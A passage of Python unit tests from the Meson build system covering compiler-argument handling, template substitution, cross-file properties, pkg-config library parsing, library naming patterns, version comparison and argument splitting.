    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
    # Adding libbaz again does nothing
    l.append_direct('/libbaz.a')
    self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
    # Adding a non-library argument doesn't include it in the group
    l += ['-Lfoo', '-Wl,--export-dynamic']
    self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
    # -Wl,-lfoo is detected as a library and gets added to the group
    l.append('-Wl,-ldl')
    self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
    """to_native() must drop every -isystem spelling that points at one of
    the compiler's default include directories, while keeping other
    arguments intact."""
    args_cls = mesonbuild.compilers.CompilerArgs
    ## Test --start/end-group
    fake_linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
    gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=fake_linker)
    # Stub the default-include query so the fake compiler binary is never run.
    gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
    cmdline = args_cls(gcc, ['-Lfoodir', '-lfoo'])
    self.assertEqual(cmdline.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
    ## Test that to_native removes all system includes
    cmdline += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
    self.assertEqual(cmdline.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
    """Exercise get_filenames_templates_dict() and substitute_values()
    across the input/output cardinality matrix (0/1/2 inputs x 0/1/2
    outputs): which @TEMPLATE@ keys are produced, how they substitute
    into command lists, and which combinations raise MesonException.
    The d/cmd locals are rebuilt per scenario -- order matters."""
    dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
    substfunc = mesonbuild.mesonlib.substitute_values
    ME = mesonbuild.mesonlib.MesonException
    # Identity
    self.assertEqual(dictfunc([], []), {})
    # One input, no outputs
    inputs = ['bar/foo.c.in']
    outputs = []
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
         '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
    cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     [inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
    cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
    cmd = ['@OUTPUT@']
    self.assertRaises(ME, substfunc, cmd, d)
    # One input, one output
    inputs = ['bar/foo.c.in']
    outputs = ['out.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
         '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     [inputs[0] + '.out'] + outputs + cmd[2:])
    cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
    self.assertEqual(substfunc(cmd, d),
                     [inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
    cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
    self.assertEqual(substfunc(cmd, d),
                     inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
    # One input, one output with a subdir
    outputs = ['dir/out.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
         '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Two inputs, no outputs
    inputs = ['bar/foo.c.in', 'baz/foo.c.in']
    outputs = []
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@INPUT@', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
    cmd = ['@INPUT0@.out', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
    cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
    self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
    cmd = ['@INPUT0@', '@INPUT1@', 'strings']
    self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
    # Many inputs, can't use @INPUT@ like this
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough inputs
    cmd = ['@INPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Too many inputs
    cmd = ['@PLAINNAME@']
    self.assertRaises(ME, substfunc, cmd, d)
    cmd = ['@BASENAME@']
    self.assertRaises(ME, substfunc, cmd, d)
    # No outputs
    cmd = ['@OUTPUT@']
    self.assertRaises(ME, substfunc, cmd, d)
    cmd = ['@OUTPUT0@']
    self.assertRaises(ME, substfunc, cmd, d)
    cmd = ['@OUTDIR@']
    self.assertRaises(ME, substfunc, cmd, d)
    # Two inputs, one output
    outputs = ['dir/out.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@OUTPUT@', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
    cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
    cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
    self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
    # Many inputs, can't use @INPUT@ like this
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough inputs
    cmd = ['@INPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough outputs
    cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Two inputs, two outputs
    outputs = ['dir/out.c', 'dir/out2.c']
    ret = dictfunc(inputs, outputs)
    d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
         '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
         '@OUTDIR@': 'dir'}
    # Check dictionary
    self.assertEqual(ret, d)
    # Check substitutions
    cmd = ['some', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), cmd)
    cmd = ['@OUTPUT@', 'ordinary', 'strings']
    self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
    cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
    self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
    cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
    self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
    # Many inputs, can't use @INPUT@ like this
    cmd = ['@INPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough inputs
    cmd = ['@INPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Not enough outputs
    cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
    # Many outputs, can't use @OUTPUT@ like this
    cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
    self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
    """The 'needs_exe_wrapper' property in a cross file must override
    whatever the environment auto-detects: first detect the default,
    then write a cross file forcing the opposite and check it wins."""
    config = ConfigParser()
    config['binaries'] = {
        'c': '\'/usr/bin/gcc\'',
    }
    config['host_machine'] = {
        'system': '\'linux\'',
        'cpu_family': '\'arm\'',
        'cpu': '\'armv7\'',
        'endian': '\'little\'',
    }
    # Can not be used as context manager because we need to
    # open it a second time and this is not possible on
    # Windows.
    configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
    configfilename = configfile.name
    config.write(configfile)
    configfile.flush()
    configfile.close()
    # First pass: what does the environment detect without an override?
    opts = get_fake_options()
    opts.cross_file = (configfilename,)
    env = get_fake_env(opts=opts)
    detected_value = env.need_exe_wrapper()
    os.unlink(configfilename)
    # Second pass: force the opposite value via [properties].
    desired_value = not detected_value
    config['properties'] = {
        'needs_exe_wrapper': 'true' if desired_value else 'false'
    }
    configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
    configfilename = configfile.name
    config.write(configfile)
    configfile.close()
    opts = get_fake_options()
    opts.cross_file = (configfilename,)
    env = get_fake_env(opts=opts)
    forced_value = env.need_exe_wrapper()
    os.unlink(configfilename)
    self.assertEqual(forced_value, desired_value)
def test_listify(self):
    """listify() must wrap scalars in a list, flatten nested lists unless
    flatten=False, and unwrap ObjectHolders when unholder=True."""
    lfunc = mesonbuild.mesonlib.listify
    # Scalars and lists pass through as lists.
    self.assertEqual(lfunc(1), [1])
    self.assertEqual(lfunc([]), [])
    self.assertEqual(lfunc([1]), [1])
    # Nested lists are flattened by default, preserved with flatten=False.
    self.assertEqual(lfunc([1, [2, 3]]), [1, 2, 3])
    self.assertEqual(lfunc([1, [2, [3]]]), [1, 2, 3])
    self.assertEqual(lfunc([1, [2, [3]]], flatten=False), [1, [2, [3]]])
    # Holders survive unless unholder=True is given.
    h1 = ObjectHolder(1)
    h3 = ObjectHolder(3)
    self.assertEqual(lfunc(h1), [h1])
    self.assertEqual(lfunc([h1]), [h1])
    self.assertEqual(lfunc([h1, 2]), [h1, 2])
    self.assertEqual(lfunc([h1, 2, [3]]), [h1, 2, 3])
    self.assertEqual(lfunc(h1, unholder=True), [1])
    self.assertEqual(lfunc([h1], unholder=True), [1])
    self.assertEqual(lfunc([h1, 2], unholder=True), [1, 2])
    self.assertEqual(lfunc([h1, 2, [h3]], unholder=True), [1, 2, 3])
    # Unholding doesn't work recursively when not flattening
    self.assertEqual(lfunc([h1, [2], [h3]], unholder=True, flatten=False), [1, [2], [h3]])
def test_extract_as_list(self):
    """extract_as_list() must return kwargs entries as lists, popping the
    key only when pop=True and unwrapping holders with unholder=True."""
    extract = mesonbuild.mesonlib.extract_as_list
    # Non-destructive by default; pop=True removes the key.
    kwargs = {'sources': [1, 2, 3]}
    self.assertEqual(extract(kwargs, 'sources'), [1, 2, 3])
    self.assertEqual(kwargs, {'sources': [1, 2, 3]})
    self.assertEqual(extract(kwargs, 'sources', pop=True), [1, 2, 3])
    self.assertEqual(kwargs, {})
    # Unholding works with and without popping.
    h3 = ObjectHolder(3)
    kwargs = {'sources': [1, 2, h3]}
    self.assertEqual(extract(kwargs, 'sources', unholder=True), [1, 2, 3])
    self.assertEqual(kwargs, {'sources': [1, 2, h3]})
    self.assertEqual(extract(kwargs, 'sources', unholder=True, pop=True), [1, 2, 3])
    self.assertEqual(kwargs, {})
    # Several keys at once yield one list per key.
    kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
    self.assertEqual(extract(kwargs, 'sources', 'pch_sources'), [[1, 2, 3], [4, 5, 6]])
def test_pkgconfig_module(self):
    """DependenciesHelper must format a pkgconfig dependency the same way
    whether it is added as a public library or as a public requirement."""
    # Minimal attribute bag; renamed from 'Mock' to avoid shadowing
    # unittest.mock imported at module level.
    class _Stub:
        pass
    state = _Stub()
    state.subproject = 'dummy'
    dep = _Stub()
    dep.pcdep = _Stub()
    dep.pcdep.name = "some_name"
    dep.version_reqs = []
    # pkgconfig dependency as lib
    helper = mesonbuild.modules.pkgconfig.DependenciesHelper(state, "thislib")
    helper.add_pub_libs([dep])
    self.assertEqual(helper.format_reqs(helper.pub_reqs), "some_name")
    # pkgconfig dependency as requires
    helper = mesonbuild.modules.pkgconfig.DependenciesHelper(state, "thislib")
    helper.add_pub_reqs([dep])
    self.assertEqual(helper.format_reqs(helper.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
    """Check cc.get_library_naming() against the expected *patterns* for
    *platform* under all four LibType modes; for openbsd also check that
    find_library_real() picks the highest well-formed numeric .so version."""
    shr = patterns[platform]['shared']
    stc = patterns[platform]['static']
    # The PREFER_* orderings are the preferred tuple followed by whatever
    # the other tuple adds that is not already present.
    shrstc = shr + tuple([x for x in stc if x not in shr])
    stcshr = stc + tuple([x for x in shr if x not in stc])
    p = cc.get_library_naming(env, LibType.SHARED)
    self.assertEqual(p, shr)
    p = cc.get_library_naming(env, LibType.STATIC)
    self.assertEqual(p, stc)
    p = cc.get_library_naming(env, LibType.PREFER_STATIC)
    self.assertEqual(p, stcshr)
    p = cc.get_library_naming(env, LibType.PREFER_SHARED)
    self.assertEqual(p, shrstc)
    # Test find library by mocking up openbsd
    if platform != 'openbsd':
        return
    with tempfile.TemporaryDirectory() as tmpdir:
        with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
            f.write('')
        with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
            f.write('')
        with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
            f.write('')
        with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
            f.write('')
        with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
            f.write('')
        # 54.0 must win: highest numeric version among the well-formed
        # candidates (66a.0b and 70.0.so.1 are malformed).
        found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
        self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
    def test_find_library_patterns(self):
        '''
        Unit test for the library search patterns used by find_library()
        '''
        unix_static = ('lib{}.a', '{}.a')
        msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
        # This is the priority list of pattern matching for library searching
        patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
                                'static': unix_static},
                    'linux': {'shared': ('lib{}.so', '{}.so'),
                              'static': unix_static},
                    'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
                               'static': unix_static},
                    'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
                                          'lib{}.dll.a', '{}.dll', '{}.dll.a'),
                               'static': ('cyg{}.a',) + unix_static},
                    'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
                                     'static': msvc_static},
                    'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
                                                 '{}.dll.a', '{}.lib', '{}.dll'),
                                      'static': msvc_static}}
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        # First verify the platform the test suite is actually running on.
        if is_osx():
            self._test_all_naming(cc, env, patterns, 'darwin')
        elif is_cygwin():
            self._test_all_naming(cc, env, patterns, 'cygwin')
        elif is_windows():
            if cc.get_argument_syntax() == 'msvc':
                self._test_all_naming(cc, env, patterns, 'windows-msvc')
            else:
                self._test_all_naming(cc, env, patterns, 'windows-mingw')
        elif is_openbsd():
            self._test_all_naming(cc, env, patterns, 'openbsd')
        else:
            self._test_all_naming(cc, env, patterns, 'linux')
        # Then exercise the remaining platforms by overriding the detected
        # host system in the machine info.
        env.machines.host.system = 'openbsd'
        self._test_all_naming(cc, env, patterns, 'openbsd')
        env.machines.host.system = 'darwin'
        self._test_all_naming(cc, env, patterns, 'darwin')
        env.machines.host.system = 'cygwin'
        self._test_all_naming(cc, env, patterns, 'cygwin')
        env.machines.host.system = 'windows'
        self._test_all_naming(cc, env, patterns, 'windows-mingw')
    def test_pkgconfig_parse_libs(self):
        '''
        Unit test for parsing of pkg-config output to search for libraries
        https://github.com/mesonbuild/meson/issues/3951
        '''
        def create_static_lib(name):
            # On macOS a real archive is built with clang + ar; elsewhere an
            # empty placeholder file suffices — presumably only macOS tooling
            # inspects the archive contents (TODO confirm).
            if not is_osx():
                name.open('w').close()
                return
            src = name.with_suffix('.c')
            out = name.with_suffix('.o')
            with src.open('w') as f:
                f.write('int meson_foobar (void) { return 0; }')
            subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
            subprocess.check_call(['ar', 'csr', str(name), str(out)])
        with tempfile.TemporaryDirectory() as tmpdir:
            pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
            env = get_fake_env()
            compiler = env.detect_c_compiler(MachineChoice.HOST)
            env.coredata.compilers.host = {'c': compiler}
            env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
            p1 = Path(tmpdir) / '1'
            p2 = Path(tmpdir) / '2'
            p1.mkdir()
            p2.mkdir()
            # libfoo.a is in one prefix
            create_static_lib(p1 / 'libfoo.a')
            # libbar.a is in both prefixes
            create_static_lib(p1 / 'libbar.a')
            create_static_lib(p2 / 'libbar.a')
            # Ensure that we never statically link to these
            create_static_lib(p1 / 'libpthread.a')
            create_static_lib(p1 / 'libm.a')
            create_static_lib(p1 / 'libc.a')
            create_static_lib(p1 / 'libdl.a')
            create_static_lib(p1 / 'librt.a')
            # Fake pkg-config invocation: returns canned --libs output that
            # references the libraries planted above.
            def fake_call_pkgbin(self, args, env=None):
                if '--libs' not in args:
                    return 0, '', ''
                if args[0] == 'foo':
                    return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
                if args[0] == 'bar':
                    return 0, '-L{} -lbar'.format(p2.as_posix()), ''
                if args[0] == 'internal':
                    return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
            # Monkey-patch at class level; restored in the finally block.
            old_call = PkgConfigDependency._call_pkgbin
            old_check = PkgConfigDependency.check_pkgconfig
            PkgConfigDependency._call_pkgbin = fake_call_pkgbin
            PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
            # Test begins
            try:
                kwargs = {'required': True, 'silent': True}
                foo_dep = PkgConfigDependency('foo', env, kwargs)
                self.assertEqual(foo_dep.get_link_args(),
                                 [(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
                bar_dep = PkgConfigDependency('bar', env, kwargs)
                self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
                internal_dep = PkgConfigDependency('internal', env, kwargs)
                if compiler.get_argument_syntax() == 'msvc':
                    self.assertEqual(internal_dep.get_link_args(), [])
                else:
                    link_args = internal_dep.get_link_args()
                    for link_arg in link_args:
                        # System libraries must never be resolved to the
                        # static archives we planted in p1.
                        for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
                            self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
            finally:
                # Test ends
                PkgConfigDependency._call_pkgbin = old_call
                PkgConfigDependency.check_pkgconfig = old_check
                # Reset dependency class to ensure that in-process configure doesn't mess up
                PkgConfigDependency.pkgbin_cache = {}
                PkgConfigDependency.class_pkgbin = PerMachine(None, None)
    def test_version_compare(self):
        """Version ordering must agree with the RPM version-comparison
        rules referenced below, plus meson-specific cases; also checks
        version_compare_many on a constraint string."""
        comparefunc = mesonbuild.mesonlib.version_compare_many
        for (a, b, result) in [
                ('0.99.beta19', '>= 0.99.beta14', True),
        ]:
            self.assertEqual(comparefunc(a, b)[0], result)
        for (a, b, op) in [
                # examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
                ("1.0010", "1.9", operator.gt),
                ("1.05", "1.5", operator.eq),
                ("1.0", "1", operator.gt),
                ("2.50", "2.5", operator.gt),
                ("fc4", "fc.4", operator.eq),
                ("FC5", "fc4", operator.lt),
                ("2a", "2.0", operator.lt),
                ("1.0", "1.fc4", operator.gt),
                ("3.0.0_fc", "3.0.0.fc", operator.eq),
                # from RPM tests
                ("1.0", "1.0", operator.eq),
                ("1.0", "2.0", operator.lt),
                ("2.0", "1.0", operator.gt),
                ("2.0.1", "2.0.1", operator.eq),
                ("2.0", "2.0.1", operator.lt),
                ("2.0.1", "2.0", operator.gt),
                ("2.0.1a", "2.0.1a", operator.eq),
                ("2.0.1a", "2.0.1", operator.gt),
                ("2.0.1", "2.0.1a", operator.lt),
                ("5.5p1", "5.5p1", operator.eq),
                ("5.5p1", "5.5p2", operator.lt),
                ("5.5p2", "5.5p1", operator.gt),
                ("5.5p10", "5.5p10", operator.eq),
                ("5.5p1", "5.5p10", operator.lt),
                ("5.5p10", "5.5p1", operator.gt),
                ("10xyz", "10.1xyz", operator.lt),
                ("10.1xyz", "10xyz", operator.gt),
                ("xyz10", "xyz10", operator.eq),
                ("xyz10", "xyz10.1", operator.lt),
                ("xyz10.1", "xyz10", operator.gt),
                ("xyz.4", "xyz.4", operator.eq),
                ("xyz.4", "8", operator.lt),
                ("8", "xyz.4", operator.gt),
                ("xyz.4", "2", operator.lt),
                ("2", "xyz.4", operator.gt),
                ("5.5p2", "5.6p1", operator.lt),
                ("5.6p1", "5.5p2", operator.gt),
                ("5.6p1", "6.5p1", operator.lt),
                ("6.5p1", "5.6p1", operator.gt),
                ("6.0.rc1", "6.0", operator.gt),
                ("6.0", "6.0.rc1", operator.lt),
                ("10b2", "10a1", operator.gt),
                ("10a2", "10b2", operator.lt),
                ("1.0aa", "1.0aa", operator.eq),
                ("1.0a", "1.0aa", operator.lt),
                ("1.0aa", "1.0a", operator.gt),
                ("10.0001", "10.0001", operator.eq),
                ("10.0001", "10.1", operator.eq),
                ("10.1", "10.0001", operator.eq),
                ("10.0001", "10.0039", operator.lt),
                ("10.0039", "10.0001", operator.gt),
                ("4.999.9", "5.0", operator.lt),
                ("5.0", "4.999.9", operator.gt),
                ("20101121", "20101121", operator.eq),
                ("20101121", "20101122", operator.lt),
                ("20101122", "20101121", operator.gt),
                ("2_0", "2_0", operator.eq),
                ("2.0", "2_0", operator.eq),
                ("2_0", "2.0", operator.eq),
                ("a", "a", operator.eq),
                ("a+", "a+", operator.eq),
                ("a+", "a_", operator.eq),
                ("a_", "a+", operator.eq),
                ("+a", "+a", operator.eq),
                ("+a", "_a", operator.eq),
                ("_a", "+a", operator.eq),
                ("+_", "+_", operator.eq),
                ("_+", "+_", operator.eq),
                ("_+", "_+", operator.eq),
                ("+", "_", operator.eq),
                ("_", "+", operator.eq),
                # other tests
                ('0.99.beta19', '0.99.beta14', operator.gt),
                ("1.0.0", "2.0.0", operator.lt),
                (".0.0", "2.0.0", operator.lt),
                ("alpha", "beta", operator.lt),
                ("1.0", "1.0.0", operator.lt),
                ("2.456", "2.1000", operator.lt),
                ("2.1000", "3.111", operator.lt),
                ("2.001", "2.1", operator.eq),
                ("2.34", "2.34", operator.eq),
                ("6.1.2", "6.3.8", operator.lt),
                ("1.7.3.0", "2.0.0", operator.lt),
                ("2.24.51", "2.25", operator.lt),
                ("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
                ("3.4.1", "3.4b1", operator.gt),
                ("041206", "200090325", operator.lt),
                ("0.6.2+git20130413", "0.6.2", operator.gt),
                ("2.6.0+bzr6602", "2.6.0", operator.gt),
                ("2.6.0", "2.6b2", operator.gt),
                ("2.6.0+bzr6602", "2.6b2x", operator.gt),
                ("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
                ("15.8b", "15.8.0.1", operator.lt),
                ("1.2rc1", "1.2.0", operator.lt),
        ]:
            ver_a = Version(a)
            ver_b = Version(b)
            # Each basic relation implies a set of derived comparisons that
            # must also hold (or must fail): check them all.
            if op is operator.eq:
                for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
                    self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
            if op is operator.lt:
                for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
                    self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
                for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
                    self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
            if op is operator.gt:
                for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
                    self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
                for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
                    self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
    def test_msvc_toolset_version(self):
        '''
        Ensure that the toolset version returns the correct value for this MSVC
        '''
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Test only applies to MSVC-like compilers')
        toolset_ver = cc.get_toolset_version()
        self.assertIsNotNone(toolset_ver)
        # Visual Studio 2015 and older versions do not define VCToolsVersion
        # TODO: ICL doesn't set this in the VSC2015 profile either
        if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
            return
        # Reference value: either the env var set by the VS developer prompt,
        # or the default-toolset file under VCINSTALLDIR.
        if 'VCToolsVersion' in os.environ:
            vctools_ver = os.environ['VCToolsVersion']
        else:
            self.assertIn('VCINSTALLDIR', os.environ)
            # See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
            vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
        # The detected toolset version must be a prefix of the full version.
        self.assertTrue(vctools_ver.startswith(toolset_ver),
                        msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
    def test_split_args(self):
        """split_args() must parse a command line per the platform rules
        (Windows argv parsing on Windows, POSIX-sh-style elsewhere).

        Each case is (cmd, expected_argv, roundtrip); when roundtrip is
        True, join_args(expected_argv) must reproduce cmd exactly."""
        split_args = mesonbuild.mesonlib.split_args
        join_args = mesonbuild.mesonlib.join_args
        if is_windows():
            test_data = [
                # examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
                (r'"a b c" d e', ['a b c', 'd', 'e'], True),
                (r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
                (r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
                (r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
                (r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
                # other basics
                (r'""', [''], True),
                (r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
                (r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
                (r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
                (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
                (r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
                ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
                # more illustrative tests
                (r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
                (r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
                (r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
                (r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
                (r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
                (r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
                (r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
